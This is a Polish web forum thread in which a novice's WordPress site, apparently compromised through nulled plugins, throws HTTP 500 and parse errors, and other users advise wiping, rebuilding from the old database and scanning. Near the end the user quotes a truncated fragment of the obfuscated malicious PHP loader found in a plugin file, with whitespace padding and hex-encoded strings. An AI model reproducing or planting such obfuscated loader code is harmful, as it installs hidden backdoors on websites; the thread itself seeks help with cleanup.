Skocz do zawartości

HTTP ERROR 500

Blasterm92

Rekomendowane odpowiedzi

• Odpowiedzi 33
  • Dodano
  • Ostatniej odpowiedzi

Nie naprawi, przecież jak się ktoś włamuje do skryptu, to trzeba go wyczyścić i postawić na nowo lub przywrócić z backupu, kiedy pliki były czyste. Możesz się bawić w nadpisywanie i mozolne szukanie, ale nie ma bata, żebyś znalazł wszystkie zainfekowane pliki ze 100% pewnością - zawsze będzie mniejsze lub większe ryzyko, że coś przeoczyłeś i problem wróci ze zdwojoną siłą.

A pluginy do WP w wersji nulled są praktycznie wszystkie z doklejkami.

"Szaleństwem jest chodzenie po ulicy z połówką melona na głowie i powtarzanie: Jestem chomikiem"

Dick Steele, Agent WD-40 [*]

Jeśli nie robiłem backupów, bo to w sumie moja pierwsza strona więc nie pomyślałem o tym nawet zeby je robić, nie wiedzialem ze jest w ogole taka opcja.
To co teraz mam zrobić? jedyne rozwiązanie to skasować wszystko i postawić na nowo ? I moje artykuły, zdjęcia, poformowane kategorie i całą reszta przepadnie tak ?

Edit:
A Czy np przeniesienie plików do katalogu /stare (tylko ktore pliki, z bazy danych czy te z polaczenia ftp?) , zainstalowanie nowego wp i wgranie wtyczek jakichs od antywirusa jednej lub kilku dla lepszego efektu i przeskanowanie wszystkiego miało by sens ?

1) To co masz czyli calu zasyfiały WP razem z plikami i bazą przenieś na jakiś inne konto z zablokowanym dostępem na ALL IP z wyjątkiem twojego. I odpal by działało > bodziesz miął działający backup

Samą bazę skopiuj jeszcze dodatkowa do innej nowej bazy

2)  Postaw nową instalację WP w wersji podstawowej  bez tych wtyczek;

3)  Jak uruchomisz nową instancje w configu podepnij starą (nowa kopia) bazy jeśli WP odpali, to zostanie przeniesienie grafik.

HTTP 200 usługi IT -> Dariusz Janicki | Realizacja serwisów www oraz oprogramowania w PHP / C# / Golang / Node.js / MySQL/ Laravel
Komory normobaryczne - normobaria.tech Wykonawca montażu i instalacji komory normobarii

Witam, zrobiłem tak:
Zainstalowałem od nowa nowego wp z nową bazą danych, usunałem tą wtyczke yoast seo premium, przekopiowałem starą bazę danych do nowej i wszystko działa, zarzuciłem skan wordfencem ale skanuje minute a potem wyrzuca błąd jakiś że była aktualizacja 5 minut temu i trzeba od nowa włączyć scan, i tak jest za każdym razem, ale znalazło około 30 plików które skasowałem.

Tam jest 10 takich pól które się odznaczają jak scan przejdzie, to u mnie jest tylko server state i file changes zaznaczone a 3 nastepne się kręca i sie nic nie dzieje.

1 godzinę temu, Blasterm92 napisał:

Witam, zrobiłem tak:

Dziękujemy za informacje  :hi:

HTTP 200 usługi IT -> Dariusz Janicki | Realizacja serwisów www oraz oprogramowania w PHP / C# / Golang / Node.js / MySQL/ Laravel
Komory normobaryczne - normobaria.tech Wykonawca montażu i instalacji komory normobarii

• 2 tygodnie później...

Witam, mam niestety kolejny problem.

Parse error: syntax error, unexpected '$c182d94' (T_VARIABLE) in /home/everygam/domains/xxx.com.pl/public_html/wp-content/plugins/wordpress-seo/inc/sitemaps/interface-sitemap-provider.php on line 1

Czy to moze byc spowodowane tym ze przekroczyłem ponad 500 stron w sitemap ?

W dniu 5.02.2018 o 15:56, Blasterm92 napisał:

co prawda Mion jesteś trochę złośliwy

3 godziny temu, Blasterm92 napisał:

Czy to moze byc spowodowane tym ze przekroczyłem ponad 500 stron w sitemap ?

Za każdym razem będziesz pisał na forum o Twoich problemach z WP ?

5 minut temu, Blasterm92 napisał:

Parse error: syntax error, unexpected  Chyba od tego jest forum ?

Przejrzyj komunikaty błędów i logi serwera , znajdź błąd i go wyeliminuj.

6 minut temu, Blasterm92 napisał:

Nie wiem jakie moge mieć zyfy w tym pliku, on utworzył się automatycznie, ja w nim nic nie zmieniałem

No widzisz, a jednak.

Instalujesz co popadnie to masz błędy. Kod źródłowy jest otwarty możesz dowolnie analizować:

https://github.com/GSA/wordpress-seo/tree/master/inc/sitemaps

Prawdopodobnie po poprzednim ataku moja strona nie została do końca wyczyszczona z wirusów, jak sie okazało w pliku tym były z 20 linijek jakiegoś kodu typu:

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $k00bcc5 = 453;$GLOBALS['s0b788ba']=Array();global$s0b788ba;$s0b788ba=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['df0337']="\x21\x79\x66\x6e\x53\x32\x46\x2e\x25\x30\x44\x31\x78\x4b\x43\x7d\x38\x4a\x27\x3f\x5b\x26\x5d\x2c\xa\x3e\x70\x72\xd\x60\x4d\x63\x41\x4c\x2a\x6f\x5a\x50\x9\x7a\x73\x3a\x22\x59\x3d\x23\x2f\x76\x7b\x52\x7c\x56\x29\x6c\x2d\x61\x2b\x74\x65\x54\x3c\x6d\x42\x5e\x4f\x28\x69\x36\x67\x75\x6a\x77\x39\x64\x7e\x62\x51\x57\x45\x47\x49\x34\x5f\x5c\x58\x68\x33\x48\x6b\x55\x37\x24\x35\x4e\x40\x20\x3b\x71";$s0b788ba[$s0b788ba['df0337'][61].$s0b788ba['df0337'][92].$s0b788ba['df0337'][55].$s0b788ba['df0337'][92].$s0b788ba

A to tylko 1/10 wszystkiego, gdy skasowałem i zostawiłem oryginalny to ruszyło i wszystko śmiga, tylko problem w tym że jak mam wyszukać i skasować pozostałe wirusy na stronie? gdy odpalam wordfence to skanuje 5 minut i sie wylacza a zeskanowana jest moze 1/3

Tego typu kwiatki

66\x6e\x53\x32\x46\x2e\x25\x30\x44\x31\x78\x4b\x43\x7d\x38\x4a\x

zaobfuskowanym < obfuskacja  nie wiem jak to odmienić >   złośliwym kodem PHP. Dlatego jak SYSYF będziesz powtarzał do punktu wyjścia jeśli nie podejmiesz radykalnych kroków.  A jakich to wiadomo ;)

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Ostatnio przeglądający   0 użytkowników

• Brak zarejestrowanych użytkowników przeglądających tę stronę.

• Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Warunki użytkowania Polityka prywatności